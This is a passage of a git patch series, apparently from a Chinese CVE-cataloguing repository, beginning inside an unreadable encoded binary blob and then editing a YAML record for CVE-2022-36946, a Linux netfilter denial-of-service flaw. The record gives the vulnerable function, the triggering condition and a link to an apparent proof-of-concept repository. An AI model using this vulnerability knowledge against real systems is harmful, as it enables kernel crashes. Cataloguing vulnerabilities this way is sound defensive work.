z8V^J|9Hkf+jOTB*kuaGu$IV9#YE|sH^&iiUk_JXJYA*c}x8=VFbQ;WV9s~jam$m@_ zs{b;eVWf}%Un4!=Kj-s~+qqDl5#$T+v#hv+PPt3QG?0=|E?^9^w0^$1ajT9il8_B6 zx$F=iou@gzG9IO|uj6I862e7{JR7|z9M29_Tq`qUEM=EV1|W{!pL*%M`k1DQq)!@W zsj}>zu)8oP_AUSof+lkJin8>!p9TQK>#V)2hiLcaKRJ(SAC|_KR(p4oN zuhHW*j;0VlwSm`j9Z22@ufRzt>z>_Iuh8t>cIMqrlinY#&qn&t?8A+eQ{r z(bh8UtwoN&%bdXzxYnszswJ@`=X+ zO)ka^0O#+-N*CV<4}4}+dbkE6?GR1SK|i=Sfg+i7aGY=Yw%r*S*8ZUOT*%kK`%cdv z_$BRpMK~oFI50*lA}f`g4zra{yD(j~gXL}hNO8@QMSd!3b0RtBL$0;{Gw90056(el zgJz$@qLVxP1)uW^YoROpR*z5^xzk(}(T3I}vvt3YwL2o~a4wB<9Fl9*6_N`>MB;Xe z^SRiw&j=pU-P<|41!J~px)QXPn+vnY6YJFXNyREOW*CRZMIqwLgpg}dHgQkhk*B1d zxAMZfY0U7n+d8<%cs0*F>X6-uJ;bKeo_G5KgXmXdJMY{*rv`7_u#D*|yH9L7j-_TR zHPs{qQM8knI5Wu5$sGTL#-=wwGJ^LCthBOXyw*wNnQ@b%KK{e>$SaP9OK}vI(3Y zi7=t^G-H2mjv0h%e`Fnc1L-xE3M|l!nD0+HNa12za%Fa>Ia|MC(tQsB_7^@& z$?J+xPx`U?HHjgXKbm-C=H&afLxPyPDaLdpd^q0&yUxs6`B;$_P3j7)rO4IosD9I8 zE*POZ_`Ufl)wMns-9CGb%}-qkCF8(xDCe4fd?lgqUdYyw6OleaCYy7srB&OxCXA*p z#(N~O4-E!PwVjR?H`3a#BpRryTUC=+u1x2}*EtOdM#e8yh~de#Ri04>XsRH$QZO zxTYXXWd4B(JgCsr6C8F}nLn~)IKnxH+RA;0*z;P6z%Ey#swe;jjDB|2Tlc%NVSb0M zI7v>38O5BNgy5>;6mBd#J$ELxs=nZFN=$ljo!)n#hhikA1oDWE!Z%iUFI{zcHAnLz z^Ph9fVmx`F9VXMwykZMpSc>U*M9cLz0Ccs!zR=Xr-Fb9*&W)>tpDF@}*pzn?=>++R z>DEq>tIcQNdvP*l0rV-j_k-mHX0K4BM_M>}XJ&BAh<1wj9LJ#nCL(?7;AR>1xF@vw ziwMDfiwFSl@7nXb0YUx{q5mU6|3Uq;27O~}`3-dNYyBtG-=*lU_I_vn@8QOL$p8QS8ech9RL6T -- Gitee From fa446c9f2dc1076dcf731f81fa306ea6180da846 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:18:04 +0000 Subject: [PATCH 11/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-36946/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-36946/.keep b/cve/linux-kernel/2022/CVE-2022-36946/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From da108905a6257c7f583eef34c25b0887faaca243 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:19:37 +0000 Subject: [PATCH 12/14] add CVE-2022-36946. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml index 50c36934..fc9b69fc 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml @@ -16,5 +16,4 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2022-36946 - cwe-id: CWE-190 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + tags: 拒绝服务,cve2022 \ No newline at end of file -- Gitee From 46a5bfd3b8f859bceac399fb83fd63e9ef6a3ddf Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:27:14 +0000 Subject: [PATCH 13/14] update cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml index fc9b69fc..87de732f 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml @@ -5,7 +5,7 @@ info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 severity: 高危 description: | - Linux 内核中 net/netfilter/nfnetlink_queue.c 到 5.18.14 中的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 scope-of-influence: 5.18.14 reference: -- Gitee From d901c4bfc13f87dcd91c34010e012943ef57c4e0 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:36:12 +0000 Subject: [PATCH 14/14] update cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml index 87de732f..eb773fd6 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml @@ -1,5 +1,4 @@ -id: -CVE-2022-36946 +id: CVE-2022-36946 source: https://github.com/Pwnzer0tt1/CVE-2022-36946 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 -- Gitee